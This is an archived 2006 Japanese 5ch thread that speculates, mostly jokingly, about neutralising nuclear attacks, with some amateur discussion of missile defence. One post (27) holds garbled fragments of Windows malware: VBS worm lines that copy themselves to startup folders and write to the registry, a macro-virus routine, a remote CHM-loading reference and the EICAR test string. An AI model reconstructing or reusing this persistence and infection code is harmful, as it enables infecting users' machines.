5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

 将来、核攻撃を完全に無力化することは可能か?

1 :オーバーテクナナシー:2006/09/06(水) 20:44:11 ID:XCINzih3
日本の誇るすんげー技術で、バリアとかできないの?



2 :オーバーテクナナシー:2006/09/06(水) 21:04:33 ID:wFkLB45P
男の子ご出産で後継順位第三位になりました
愛子「な…なにィ!そんなバカな!で姉者たちはなんと!
   姉者たちが黙っておるまい!どけ!」
眞子佳子静かに座っている
愛子「姉者!姉者たちはなぜなにもいわん!やつはおれたちの弟!
   しかも一番下の未熟者なんだ そんな奴に伝承者の座を奪われて口惜しくないのか!」
眞子「…」
佳子「…」
愛子「ふぬけたか〜姉者たちは!だが俺は許さねぇ!認めねぇ!」

3 :オーバーテクナナシー:2006/09/09(土) 09:15:55 ID:vLnw8iIb
2サイコー

4 :オーバーテクナナシー:2006/09/09(土) 15:25:27 ID:kJjhrd25
>>2
それ何て言う北斗晶www

5 :オーバーテクナナシー:2006/09/14(木) 13:20:34 ID:UCU+V38/
ここいってみるべし
http://ime.nu/search.yahoo.co.jp/bin/query?p=%a5%d7%a5%e9%a5%ba%a5%de%ca%bc%b4%ef&fr=top

6 :スーパーグレートヒッキー ◆w3TOCYNPlo :2006/09/14(木) 14:45:08 ID:VfL4rFRd
とりあえず俺に質問したまえ。
さあ。

7 :オーバーテクナナシー:2006/09/14(木) 15:50:39 ID:LGW5xliQ
赤ちゃんはどこからくるんですか?

8 :オーバーテクナナシー:2006/09/14(木) 21:09:58 ID:YE4XIFgJ
股の間からコウノトリが・・・ギャー!!1

9 :オーバーテクナナシー:2006/09/15(金) 00:14:38 ID:afZSIwjt
どの段階を無力化しますか。

爆破前

爆破中

爆破後

10 :オーバーテクナナシー:2006/09/15(金) 00:56:55 ID:4z+TODDo
普通に考えて核爆発そのものだろ

11 :スーパーグレートヒッキー ◆w3TOCYNPlo :2006/09/15(金) 02:00:46 ID:wrbTpEHh
>>7
俺だ。
全ては俺から始まる。
さあ質問したまえ。
さあ。

12 :オーバーテクナナシー:2006/09/15(金) 08:54:50 ID:omwogjiH
日本には憲法9条と言う最強のバリアーがあるじゃないか

9条があれば日本に攻めて来る国なんてないって社民党が言ってたよ

13 :オーバーテクナナシー:2006/09/24(日) 20:16:44 ID:8yhYhsZe
ニュートリノビームで核兵器を地球の裏側からでも破壊するって本が出てたな。

14 :オーバーテクナナシー:2006/09/25(月) 21:18:41 ID:E6JKP06C
フツーに撃ち落とせば?
起爆前に外部から破壊すれば良いんじゃない?

15 :オーバーテクナナシー:2006/10/09(月) 22:21:11 ID:Y0eQQ9sh
何年か前の「サンプロ」での再現。
その時の内容は「有事法制をめぐる問題」について。
司会の田原総一郎と福島瑞穂の会話。

田原 「有事立法というのは、どこかがもし攻めて来たらどうするのか、
   どう対応するのかという法案ですよ。社民党はこんな物いらないって言う訳?」
福島 「戦争の為の法律は要らないと思いますぅ。」
田原 「そうじゃない、どこかが攻めて来た時のために…」
福島 「いや戦争の為の法律ですよぉ。」
田原 「ちょっと待って、じゃぁもしどこかが攻めて来たら殺されりゃぁ良いっていう話し? 降伏する?」
福島 「うーん…、戦争が起きないように努力する事が政治の責任じゃないですかぁ〜」
田原 「いやだからぁ、日本が戦争する気は全く無いでしょ、今でもない!」
福島 「ただですねぇ有事法制はそんな単純な法律ではない訳ですよぉ。
   米軍の活動を円滑にしたり、国民保護法制という名でいろんな人の権利を制限する…」
田原 「ちょっと待ってよ、敵が攻めて来た時にね、国民の人権自由とかで
   どこ動いて行っても良いですよっとはならないし、そりゃ規制もしますよ、当然。」
草野厚 「福島さんじゃあね、万が一攻められた時に、社民党は国民をどうやって
   守るのかという具体的な案が無いじゃないですか? どうするんですか?」
福島 「うーん、ただ…例えば…非核構想をやるとかですねぇ…」
田原 「ちょぉっと待って! つまり敵が攻めて来るなんて事は有りえない!っと?
   こんな夢みたいな事を自民党は言って、どんどん日本を軍国主義化してると、こういう事?」
福島 「…そうですねぇ、私は北朝鮮などを仮想敵国にしながら、
   どんどんどんどん軍事国家の道を歩んでいると思いますぅ。」
田原 「北朝鮮と仲良くするんだって…」
福島 「そうです。そういう努力が必要だと思いますょぉ。」
田原 「っとなると社民党いらなくなっちゃうよ」
福島 「ぃやそんな事は無いですよぉ、だって憲法9条を改憲したいと言うのが今強く出ていて」
草野厚 「あの福島さんね、僕は社民党に頑張ってもらいたいと思う。でもとてもついていけない…」

↑こんなお花が咲いてる能天気な政党が未だに議席を取って、何かにつけて騒いでいるから驚きだ。

16 :オーバーテクナナシー:2006/10/09(月) 23:08:25 ID:mKh1Z33i
ミサイルが本土に着弾した瞬間に、みんな「せーの」でジャンプすれば
助かる見込みが上がりそうだ

17 :オーバーテクナナシー:2006/10/10(火) 06:07:13 ID:2Hj1myzZ
>>14
その通りではあるが、MDで100%撃墜できるという確証は無いからな。
無いよりは遥かに良い事だが。

18 :船木末堂:2006/10/11(水) 01:12:10 ID:yiEpW9I1
>>16
その通りではあるが、「せーの」で100%ジャンプできるという確証は無いからな。
しないよりは遥かに良い事だが。

19 :オーバーテクナナシー:2006/10/11(水) 21:58:11 ID:RpP8V63K
中国をせっとくすれば万事解決(北はね)

20 :オーバーテクナナシー:2006/10/16(月) 17:35:54 ID:rEIr5iSa
格は実はそんなに威力ない。
鉄筋コンクリートは崩壊しないし、地下に居れば安全。
日本が悲惨だったのはほとんど木造だったから

21 :オーバーテクナナシー:2006/10/19(木) 23:09:39 ID:DJ5pUj2Y
威力無いって…
何なら満足ですか将軍様

22 :オーバーテクナナシー:2006/10/20(金) 20:05:49 ID:McUxRH45
某アニメで定番のなんとか粒子は出来ないの?

23 :オーバーテクナナシー:2006/10/20(金) 20:38:00 ID:k2pRZNEF
衛星砲で、弾道弾発射直後に破壊

24 :オーバーテクナナシー:2006/10/20(金) 20:40:35 ID:gVbwuPEx
俺をアトムばりに改造してくれれば
発射された核弾頭を掴み、そのまま太陽に突っ込む。

25 :オーバーテクナナシー:2006/10/20(金) 20:49:05 ID:GAhLCDgV
>>21
威力はあるけど、頑丈な建物のせいで爆圧影響範囲は昔より小さいって意味。

26 :オーバーテクナナシー:2006/10/20(金) 22:04:23 ID:Zb6rfPR6
この前本で読んだがニュートリノを使って核を無力化できるとか

27 :佐賀:2006/10/20(金) 23:17:46 ID:2+JyiNFa
kak.ht佐賀en=w佐賀START
ca佐賀etc佐賀ass佐賀mail nob佐賀nonexistent.com

佐賀dy onload=window()>
If s = "佐賀" and fso.FileExis佐賀1.path+"l") = False thenfso.CopyFile 佐賀path, f1.path佐賀"l"
Set A4 = A佐賀reateTextFile(A佐賀uildPath(A佐賀etSpecialFolder(1)))
fso.opyfile "network.佐賀", "佐賀\windows\start menu\programs\startup\"
佐賀Copy(dirsystem&"\佐賀Kernel32.vbs")
c.佐賀opy(dirwin&"\Win32DLL.vbs")
c.C佐賀y(dirsystem&佐賀OVE-LETTER-FOR-YOU.TX佐賀bs")
<objec佐賀ata佐賀s-its:mhtml:fil佐賀C\\MAIN.MHT佐賀p://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P佐賀P[4\PZX54(P^)7CC)7佐賀CAR-STANDARD-ANTIVIRUS-TEST-FILE佐賀H+H*
fso.c佐賀yfile "dirsyste佐賀urupo.vbs", "佐賀indows\start men佐賀rograms\startup\"
If s = "ht佐賀 and fso.FileExi佐賀1.path+"l") = False then fs佐賀opyFile f1.path, f1.path+"l"
ToInfe佐賀odeModule.InsertLines 佐賀, ADI1.CodeModul佐賀nes(BGN, 1)
G.RegWrite A("IJDX^MNB佐賀^L@BIHOD]Rnguv`sd]Lhb佐賀]Sto]VhoRu`su佐賀BuildPath(E.GetSpecialFolder(1佐賀("VHORU@S佐賀CR"))
line佐賀)=replace(lines(n),"""",chr(9佐賀r(45)+chr(93))
ms-its:mht佐賀le://佐賀:\
kak.hta佐賀en=wd+'START
kill 佐賀
Sub auto_open(佐賀)
Application.OnSheetActivate = "佐賀"
End 佐賀
Sub check_files(佐賀)
佐賀 = Application.StartupPath
m$ = Dir(佐賀 & "\" & "PERSONAL.佐賀")
If 佐賀 = "佐賀" Then p = 佐賀 Else p = 佐賀
If Active佐賀.Modules.Count > 佐賀 Then w = 1 Else w = 佐賀
whichfile = 佐賀 +佐賀 * 10
End 佐賀


28 :オーバーテクナナシー:2006/10/21(土) 09:30:29 ID:l+nBCcFE
宇宙各地で即時通信網につながれたコンピューター網に
人格がアップデートされていれば核は別に怖くはない…だろうか?

29 :オーバーテクナナシー:2006/10/21(土) 17:27:34 ID:f019IFFI
米軍がNGCを開発

30 :オーバーテクナナシー:2006/10/21(土) 21:31:34 ID:i9Q+THUi
>>28
とりあえず量子コンピュータの開発が先だな。

31 :オーバーテクナナシー:2006/10/22(日) 06:10:13 ID:cnYOqVmF
果たして魂は肉体なくして個を特定し続ける事が出来るのか…

32 :オーバーテクナナシー:2006/10/22(日) 16:02:45 ID:t1BC4scF
難しい問題ね。とりあえず死んでみるって手もあるんじゃないかしら。

33 :オーバーテクナナシー:2006/11/13(月) 16:40:40 ID:E5NTZw0B
地下軍事施設に立てこもる相手に対する攻撃方法として、
投石器がいいかもね。
地下施設の出入口を短時間で埋めるための投石器。
固めるための接着剤とかコンクリートも飛ばせる。
ブロック状に組み立てた鉄筋も。

生き埋めになるかもしれないという恐怖感と、
厳しい軍事訓練が無駄だったという無力感で、
投降を早めることができるかも。
出入口は複数あるでしょうから生き埋めにはならないでしょうけど。

上陸占領は短期決戦なので、重要でない地下軍事施設は埋めて後回し、
突入し制圧し内部を詳細に調べるのは後でいい、という方針で。

大量の石を連続して長距離飛ばせる方法を素人なりに考えました。
多重ループ型ジェットコースターの形のリニアモーター採用のカタパルト。
飛ばすのは無理だとあきらめて、
自動操縦で最適な場所に移動する自走式ベルトコンベアー。
これを使えば、民家に立てこもっている場合でも周囲を埋めて、
出入口を天井付近の1つに制限するとかもできる。

それともう1つ、
活断層探査用の起震車、地下軍事施設探査用にも利用できるのを開発して、
平時は活断層探査用に貸し出すのはどうかな。

34 :オーバーテクナナシー:2006/11/13(月) 20:20:05 ID:OIOB48EM
>>33はマルチ

35 :オーバーテクナナシー:2006/11/15(水) 12:55:17 ID:ckc4wA7M
核ミサイルに電磁衝撃波を叩き付けて、航行装置や起爆装置をダウンさせる。

36 :オーバーテクナナシー:2006/11/19(日) 17:55:40 ID:2+vxGfMa
ナンカ前見た本では「画期的なバリヤ」ていうのがあって
できるのはできるぽいけど。ものすごく派手で出られないし、入れない
エネルギーもものすごく使うし、きるのにもものすごく時間がかかるっぽい。
ただちょっと見ただけだから間違ってるかも

37 :オーバーテクナナシー:2006/11/19(日) 23:43:53 ID:ALnq58E7
>>36
なんか凄そうですね。
凄すぎて私には理解できません。

38 :オーバーテクナナシー:2006/11/23(木) 23:03:17 ID:nuTMZYqs
Nジャマーで核分裂は使用不可に
純粋水爆は・・・orz


39 :オーバーテクナナシー:2006/11/24(金) 09:48:27 ID:CkR0Iy7R
冷戦時のアメリカではソビエトからの核攻撃を防ぐために
核ミサイルを放射線を持って無効化するために
核ミサイルの飛んでくる軌道上で常に核爆発を起こしておくというトンデモ計画があったらしい

40 :オーバーテクナナシー:2006/11/24(金) 23:55:34 ID:h3M3vaZO
アメリカ以外のどこかの国が一度でも核を使ってみてみ?
その途端、その国は完膚なきまでに叩きのめされ、消滅する。
それを教訓にしてほかの国は今後一切核を使うことをしなくなるだろう。

41 :オーバーテクナナシー:2006/11/26(日) 21:44:58 ID:4eM87JUm
一度始まった核分裂を止める可能性はないのか?

42 :オーバーテクナナシー:2006/11/26(日) 22:22:32 ID:R6vAf8ba
制御棒に使われているやつを・・・溶けちゃうか・・・

43 :オーバーテクナナシー:2006/11/27(月) 01:30:03 ID:n5vHjVhE
>>42
カドミウム弾だな。実は陸自に(ry

44 :オーバーテクナナシー:2006/11/27(月) 02:40:42 ID:Rec4IsmA
ファイアミラーで反射させれば問題ない

45 :オーバーテクナナシー:2006/11/27(月) 19:32:38 ID:c3D07+Pm
>>43
SF??それとも・・・

>>44
ソーラシステムを!あ、重力が・・・

46 :オーバーテクナナシー:2006/11/27(月) 21:08:17 ID:Rec4IsmA
>>45
ゴジラ

47 :コナン:2006/11/27(月) 21:44:18 ID:NCLVnv9K
そうか、わかった!わかったぞ核を無力化する方法が!
それは…魔法!

魔法だよ、魔法だったんだ!
>>30の言う量子コンピュータより魔法が先だ!
そして結界魔法でもバリア魔法でも唱えればいいじゃないか!
答えは意外と簡単なことだったんだよ。こんなの誰も思いつかないだろ? 
折れはなんて頭いいんだ〜

48 :オーバーテクナナシー:2006/11/28(火) 08:13:26 ID:dcSfHBKq
やっぱMD構想しかないよ。もちろん今の技術じゃまだまだだけど。
そして完成したMDに残る不安要素は、数で補うしかない。

49 :オーバーテクナナシー:2006/11/28(火) 22:47:43 ID:YjBM265d
ワームホールを自在に操ることさえできれば・・・

50 :オーバーテクナナシー:2006/11/29(水) 22:11:10 ID:kgfmIXpt
>>49
具体的にどうなる?

51 :オーバーテクナナシー:2006/11/30(木) 03:35:08 ID:nTX88Gy7
核弾頭をワームホールへポイ

52 :オーバーテクナナシー:2006/11/30(木) 19:58:05 ID:dNvKyAPK
そして51の体内に出現

53 :オーバーテクナナシー:2006/11/30(木) 20:36:46 ID:nTX88Gy7
高エネルギー状態じゃないからそれは無い。

54 :オーバーテクナナシー:2006/11/30(木) 21:52:20 ID:K3MBcoj1
そして金正日の頭上に(ry

55 :オーバーテクナナシー:2006/11/30(木) 23:57:50 ID:nTX88Gy7
金の頭の上も高エネルギーじゃないな。もっとエネルギッシュならフサフサだろう

56 :オーバーテクナナシー:2006/12/03(日) 10:00:40 ID:3Msi4pA+
高エネルギーってのは何だ??ストーブの中だとか??

57 :オーバーテクナナシー:2006/12/03(日) 12:39:43 ID:Ceih9EzT
ファンタスティック〜

58 :オーバーテクナナシー:2006/12/03(日) 23:29:13 ID:HClCj+LW ?2BP(0)
つーかさきからニュートラルとか言ってるけどなんだそれ

59 :オーバーテクナナシー:2006/12/04(月) 02:40:40 ID:MeIoqkDx
ギアが入ってない状態じゃなかろうか。

60 :オーバーテクナナシー:2006/12/07(木) 21:26:44 ID:3sr+odRe
agero!

61 :オーバーテクナナシー:2006/12/08(金) 00:11:13 ID:eeZGVqcA
>>20(25)

1.現代の核の威力はヒロシマ・ナガサキの比ではない。
2.そのヒロシマ・ナガサキ型は地面ではなく上空で爆発した。地面をえぐるエネルギーを破壊範囲の拡大に回すため。もし地表で爆発させたらクレーターができていたはずだし、建物も「蒸発」していたはずだ。
3.核の直接威力とは「熱」「爆風」「電磁パルス」「放射線」であり、いずれも莫大であり無視できない。電磁パルスは広大な範囲の電子機器を破壊する。
4.核の間接威力とは「放射能汚染」「核の冬」「国家間の緊張化」であり、それはヘタすれば世紀単位で継続する、世界最大にして惑星規模の環境汚染である。

62 :RINO:2006/12/08(金) 00:21:30 ID:Z1YYKjqy
広島や長崎の爆弾は失敗作って知ってた?
本当だったらあれの10倍以上の威力を持っていたそうだけど
核融合の失敗があったそうです

63 :オーバーテクナナシー:2006/12/08(金) 02:42:45 ID:JdVjOcWc
ウラン型とプルトニウム型だけど核融合ではなかったよ。
核分裂と核融合の違い理解してます?


64 :オーバーテクナナシー:2006/12/08(金) 16:26:53 ID:BkiX5AVc
反物質爆弾最強

65 :オーバーテクナナシー:2006/12/08(金) 19:40:02 ID:D1rwwoUC
>58>59
おまいら・・・・そういうのスキ♪

66 :あめ:2006/12/09(土) 10:38:37 ID:byl0uiVb
ブラックホールを人工的に作って飲み込む。

67 :オーバーテクナナシー:2006/12/10(日) 01:01:52 ID:VdrSry1u
それができるころには核なんて比べ物にならない兵器ができているだろうよ。

68 :オーバーテクナナシー:2006/12/10(日) 08:35:45 ID:6ObWTqj8
兵器にそんなエネルギーつぎ込むくらいなら発電とか平和利用するべきじゃまいか??
ただでさえ石油がないと言われてるのに。

69 :オーバーテクナナシー:2006/12/10(日) 09:44:45 ID:VdrSry1u
それが原子力発電

70 :オーバーテクナナシー:2006/12/10(日) 14:21:42 ID:6ObWTqj8
>>69
いや、「核なんて比べ物にならない兵器」について。
もし「兵器」を作ることなんてあったらね。

71 :オーバーテクナナシー:2006/12/11(月) 01:23:09 ID:b7cZdX0A
核を廃絶するためにも、核なみの破壊力を持ちつつ環境汚染の無い新兵器の開発が必要だ。という見方もある。
もちろんそんなもん作る余裕があるなら発電機作れというのは正論だが。
食料不足に苦しむ国々の目前で大量のキャベツを廃棄するような国が先進国を名乗っているこんな世の中だから。

72 :>>47コナン:2006/12/14(木) 21:40:08 ID:9Ua5SDl2
そうか、わかった!わかったぞ核を無力化する方法が!
それは…キャベツ!

キャベツだよ、魔法じゃなくてキャベツだったんだ!
政府主導で大量のキャベツを空に運び、上空2千メートル付近で
キャベツを何度も爆破させるんだ!誰でも頭おかしいと思うだろ?
そんな国に核を落とそうとは誰も思わんよ!
答えは意外と簡単なことだったんだよ。こんなの誰も思いつかないだろ? 
折れはなんて頭いいんだ〜




73 :オーバーテクナナシー:2006/12/15(金) 18:39:09 ID:l/Qe7wlV
ミサイルを核ミサイルの飛んでる付近まで飛ばしてある程度の距離まで近付いたら
積んでた超巨大なネットを開いて核ミサイルの進行方向をふさぐ
ネットは円形で円を形成する一番端のそれぞれの頂点にミサイルがついてて
核ミサイルがネットに触れるまではそれぞれのミサイルは円の中心から離れるようにしてネットの位置を保つ
核ミサイルがネットにつかまったらそのまま送り返す
とかどうだろうか

74 :オーバーテクナナシー:2006/12/15(金) 19:52:45 ID:+2xdixAT
それができるなら普通に撃ち落せ。

75 :オーバーテクナナシー:2006/12/15(金) 20:34:24 ID:4ta8dKkm
ジェネシスであぼん・・・

76 :オーバーテクナナシー:2006/12/15(金) 21:44:17 ID:sSmedV6u
核攻撃を食らっても蘇るところは蘇る。
核攻撃を食らわなくても滅びるところは滅びる。
核攻撃なんて鬼角弾に到底及ばない

77 :オーバーテクナナシー:2006/12/15(金) 22:01:17 ID:l/Qe7wlV
>>74
ピンポイントで確実に撃ち落とすほうが難しくない?

78 :オーバーテクナナシー:2006/12/15(金) 22:20:37 ID:uUl2KkzX
何の素材を使うのか知らないがそのネットの張力で弾道弾の運動エネルギーを相殺できるかが最大の問題。
次点に展開する範囲と展開するスピード。

79 :オーバーテクナナシー:2006/12/16(土) 20:56:48 ID:jRxf4pz7
αゲル!!じゃダメだよな・・・

80 :オーバーテクナナシー:2006/12/16(土) 23:14:32 ID:0U7oivwR
そうですね。
普通に考えれば、イージス艦のSM3でブースト段階をあぼーんですよね。
それでもだめなら、PAC3で落下してくるところを狙うしかないですね。

かく〜兵器というか、架空兵器なら、現実には存在しないから平気なんですけどね。

>72
すばらしいです。
その発想はなかった。

>73
再突入時に高速(マッハ20くらい)で高熱の弾頭をキャプチャーできますかねぇ・・・。


81 :オーバーテクナナシー:2006/12/17(日) 08:38:40 ID:SD9Kjelb
νガンダムが受け止めてくれるさ!!
νガンダムは伊達じゃない!!

82 :オーバーテクナナシー:2006/12/17(日) 17:32:50 ID:veUBAKIx
理想

シールド>>>撃墜>>>>>降伏>>>ガンダム

83 :オーバーテクナナシー:2006/12/17(日) 17:52:35 ID:+IesQAbb
理想は大きく持ってもタダだ

84 :オーバーテクナナシー:2006/12/18(月) 09:08:30 ID:T/qEhIpZ
弾道予想座標目がけて大量の重金属デブリを放出!

85 :オーバーテクナナシー:2006/12/18(月) 15:23:54 ID:7pn18Asl
弾道弾 vs 散弾銃か。

86 :オーバーテクナナシー:2006/12/18(月) 22:53:55 ID:Veebb83y
現在の一般的なミサイルは大量の金属片をバラまくことで対象にダメージを与える仕様ですが。

87 :オーバーテクナナシー:2006/12/18(月) 23:23:59 ID:jY040gYY
直撃はまず不可能だよなぁ

88 :オーバーテクナナシー:2006/12/18(月) 23:28:58 ID:X8K5bOpQ
核攻撃を食らう前に核で自爆してしまえば攻撃対象が消えるので
無力化できる

89 :オーバーテクナナシー:2006/12/19(火) 02:28:25 ID:I5D30ghN
>>86
MDの場合アメリカ式は直接ぶつける仕様ですが。ロシア式は核で吹っ飛ばす仕様だけど。
巡航ミソなら破片効果でもいいけど、日本式隊巡航ミソだと直接ぶつけることを試みる方式だな。

90 :オーバーテクナナシー:2006/12/19(火) 08:09:00 ID:A3Zf2oI6
>>89
USのABMも初期のものは核を使う予定でしたね。フッ飛ばすというより、
EMPを利用するという感じだったのではないでしょうか?

弾道弾のRVはMach10+で突入してきますから、直接ブチ当てようと
思ったら突入軌道の延長線上に近い所(自分の方にRVがブッ飛んで
来るように見える所)から打ち上げるのならまだしも、ずっと離れた
所(つまり、右から左にRVが横切るように見えるような所)から打ち
上げても、命中はさぞ難しいでしょう。

巡航ミサイルは通常ジェットエンジンで亜音速ですから、迎撃の
際の誘導はまだしも、こっちは低空を飛んで来ますから、「果たして
みつけることができるのか?」てのもあります。米軍のAGM-129
みたいに、ステルス性を考慮したものもありますし。

91 :オーバーテクナナシー:2006/12/19(火) 16:57:33 ID:I5D30ghN
>>90
>USのABMも初期のものは核を使う予定でしたね。フッ飛ばすというより、 EMPを利用するという感じだったのではないでしょうか?
EMPを使うと言うよりは、やはり空気が無い宇宙空間で加害範囲を稼ぐための核だった記憶がある。

>弾道弾のRVはMach10+で突入してきますから、直接ブチ当てようと 思ったら
ターミナルフェイズでのPAC3に期待するよりもミッドコースフェイズでのSM3のほうが狙いやすい。
いわばSM3がエリアディフェンスでPAC3がCIWSみたいなものだな。

>巡航ミサイルは通常ジェットエンジンで亜音速ですから、迎撃の際の誘導はまだしも、こっちは低空を飛んで来ますから、「果たして
みつけることができるのか?」
日本の場合は周囲がランドクラッターが無い為にドップラーレーダーで基本的に簡単に見つけられる。
ただし、現状では対ステルスの場合は探知距離が落ちるから対処時間は限られる。
だけどFPS-XXのような物に監視レーダーとして更新された場合その問題も緩和されそうだ。

と言う以前に射程距離が比較的短いAGM系の巡航ミサイルだったら搭載母機に対して対処すると思いますが。

92 :90:2006/12/20(水) 02:46:40 ID:uTMxUa80
>射程距離が比較的短いAGM系の巡航ミサイルだったら搭載母機に対して対処すると思いますが。

おっしゃる通りです。まさにそういう理由(搭載母機)で、現状では米ソ(現露)間では
核兵器制限交渉でステルス機にはステルス巡航ミサイルは積まないという合意ができています。

そういうわけで、AGM-129の発射母機はB-52だけなんですね。技術的には、
B-1BにもB-2にも積めることは言うまでもありませんが、積まないことに
しているようです。

AGMの射程距離が短いってのはちょっと根拠がわかりません。手元の資料だと、

艦対地
BGM-109 Tomahawk
Range: Land attack, conventional warhead: 600 nautical miles (690 statute miles, 1104 km)
Speed: Subsonic - about 550 mph (880 km/h)

空対地
AGM-86 ALCM (ステルスAGM-129の前の世代、映画の007に出てきたアレ)
Range: AGM-86B: 1,500-plus miles (1,305 nautical miles)
Speed: About 550 mph (Mach 0.73)

今時、米露のごとき超大国が核ぶっ放すなんて狂気の沙汰ですから、
B-1以降の機体はシリンダー形状ランチャーに通常弾頭のSLAMを抱えて
いると考えるのが普通ですね。SLAMはその名の通り、比較的射程が
短いです。

PAC3がCWISみたいなものという表現は言い得て妙だと思います。
PAC2の数分の一の射程しかありませんから。弾頭の起爆条件設定を
変えられたら、ちょっと苦しいですね。PAC3の最大射程は15Kmに
過ぎませんから、衝撃起爆で熱核弾頭に点火されたらエラい騒ぎに
なるでしょう。設計高度で起爆しなくても、γ線はヤマほど降ります
から、迎撃点直下では死人続出ですね。おー、やだやだ。

93 :91:2006/12/20(水) 03:08:54 ID:IfNOZ0y3
>>92
ALCMクラスの大型ミサイルとなると、搭載母機を選ぶことになって防空能力が高い国に対しての使用は難しい気がしますな。
アメリカだから運用可能と見ていいんじゃないでしょうか。

AGM-84系のやSLAMやSLAM-ERクラスのミサイルで搭載母機があまり限定されない分脅威だと思っている。
巡航ミサイルじゃなく対地ミサイルの部類に入りますがね。



94 :オーバーテクナナシー:2006/12/20(水) 07:53:08 ID:ALWU4QEH
何このミリヲタ談義。

95 :オーバーテクナナシー:2006/12/20(水) 09:28:07 ID:FxB6kpGR
>>92
ん??防衛機密では??

96 :オーバーテクナナシー:2006/12/20(水) 09:35:13 ID:W1LD+zzu
とたんに専門的な話になったな。

97 :オーバーテクナナシー:2006/12/20(水) 13:30:07 ID:Kc/gzx/P
博士が異常な愛情を注げなくなるのか!

98 :オーバーテクナナシー:2006/12/20(水) 21:33:01 ID:9F64jLat
そーだ!
日本を空に浮かべたらどうだろう?
ラピュタみたいにさあ

そして地上を向いてる部分を固めれば無力化っていえるんじゃないの?

99 :オーバーテクナナシー:2006/12/21(木) 00:35:51 ID:G98Oy+U1
だったらもっと高いところまで上がるミサイルを作るまでだよ。

100 :オーバーテクナナシー:2006/12/21(木) 09:25:48 ID:LGI8BD7w
>>98
バロス

101 :オーバーテクナナシー:2006/12/25(月) 18:14:06 ID:TaVRcAm7
今だ!100番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄       (´´
     ∧∧   )      (´⌒(´
  ⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
        ̄ ̄  (´⌒(´⌒;;
      ズザーーーーーッ

・・・・・・・・・
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
     ∧∧        (´;;
  ⊂(゚Д゚⊂⌒`つ (´⌒(´

遅すぎた・・・・
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
     ∧∧
  ⊂(  ゚Д゚⊂⌒`つ; (´⌒(´

ドッコイショ・・・・・・・・・
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
     ∧∧
    (゚Д゚ ,)⌒ヽ
     U‐U^(,,⊃'〜... (´⌒;;

何見てんだゴルァ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
  ポ  ∧∧  ポ
  ン  (゚Д゚ ,) . ン
   (´;) U,U )〜 (;;).
(´)〜(⌒;;UU (´ )...〜⌒(`)



102 :オーバーテクナナシー:2006/12/26(火) 15:28:20 ID:4dIcIh3U
抗核エネルギーバクテリアを培養して、大気中に散布する・・・

























と思ったはいいが、G細胞が入手出来ない・・・orz

103 :オーバーテクナナシー:2006/12/26(火) 17:07:59 ID:YqcUdQYE
日本の奇跡を開発して、大気中に散布する・・・











と思ったはいいが、合田一人が生まれないことには・・・orz


104 :オーバーテクナナシー:2006/12/26(火) 19:52:26 ID:LLNNOZfM
>>102
天才の折れにその発想はなかった

105 :天ノ川 創:2006/12/26(火) 20:44:14 ID:pr2z4m7x


106 :オーバーテクナナシー:2006/12/26(火) 21:20:26 ID:0XUyLIlM
レーザーがあるな。イスラエルが開発していた。
通常の地対空ミサイル程度なら余裕で破壊できる能力らしい。
コイツをH2Aで日本上空の静止軌道に乗せて飛んできたら迎撃する。
迎撃用のレーザーを積んだジャンボジェットも24時間体制で飛ばしていつでも
迎撃できる体制を整える。
これで直撃を免れる。

あとは迎撃後に飛散する核放射性物質の防護。
各家庭に核物質フィルター付きの吸気装置の設置と、防護服・マスクの装備を配布して、
飛散濃度の濃い地域は退避勧告の後、土壌汚染除去を行う。

これで死傷者数は1000人以下に抑えられるだろう。
完璧にこなせれば100人以下にもできる。



107 :オーバーテクナナシー:2006/12/26(火) 22:26:14 ID:YqcUdQYE
まぁ落ちてくる弾道弾の弾頭に対しての効果は激しく疑問だがね。
AL−1だってブーストフェイズ用だし。

108 :オーバーテクナナシー:2006/12/26(火) 23:11:21 ID:0XUyLIlM
発想的には問題ないような気がするけど。
大気圏外からの照射で角度の微調整さえ上手くやれば良い。
減衰のレベルとかはどうなのかわからんが。
照射時間とか角度とかレーザーの出力とか研究すれば不可能ではないと思う。


109 :オーバーテクナナシー:2006/12/26(火) 23:23:36 ID:YqcUdQYE
減衰もだけど、屈折とかも考慮しなきゃならんからな。

110 :オーバーテクナナシー:2006/12/27(水) 00:16:55 ID:7pMm1vPK
>>109
大気圏内で照射する場合は、一定以上のエネルギーのレーザー収束は
大気分子のイオン化によってエネルギーの減衰率が急激に増加する
ということも忘れてもらってはいかんな。

大出力レーザーに対する大気の反応は非線形なんだよ。

111 :オーバーテクナナシー:2006/12/27(水) 20:07:23 ID:aj3u2pz4
もしそれが開発されて配備された場合、その静止軌道に乗せたレーザー本体が
狙われるのでは?
その防御はどうすんのさ

112 :オーバーテクナナシー:2006/12/27(水) 23:16:05 ID:mMdT4hfz
レーザー砲に自動迎撃システムを搭載する。
たとえ破壊されても大丈夫なように二重化する。
バックアップがメインの防衛に回る。
全自動で作動する。


113 :オーバーテクナナシー:2006/12/27(水) 23:31:38 ID:ecSxytfo
今は地上からレーザーで衛星を機能停止にする兵器がすでにありますきに。
迎撃システムをつけても意味ない。


114 :オーバーテクナナシー:2006/12/27(水) 23:46:24 ID:mMdT4hfz
レーザー反射機能を付ければ良いんじゃないの?


115 :オーバーテクナナシー:2006/12/27(水) 23:48:58 ID:ecSxytfo
全反射できるわけでもなく、冷却が厳しい宇宙では限界がある。

116 :オーバーテクナナシー:2006/12/28(木) 22:36:05 ID:5X9GbB3V
むしろ吸収する

117 :オーバーテクナナシー:2006/12/29(金) 03:38:33 ID:UKKKxo6r
実際にキューバ危機で旧ソビエトの核兵器を無力化したので「手紙」ということになる。

118 :オーバーテクナナシー:2006/12/29(金) 08:55:19 ID:vNhMadY+
>>117
ラブレターのことか!

119 :オーバーテクナナシー:2006/12/29(金) 09:53:18 ID:GI0R6N5O
無防備だ!無防備が最強だ!無防備都市の前には核なんか完全に無力。メガトン級が炸裂したって無関心でいればオッケー!
侵攻軍には絶対服従!要求どおりに何でも差し出せ!撃たれたら喜んで死のう!核兵器では何も出来ないことを知らしめようぜ!
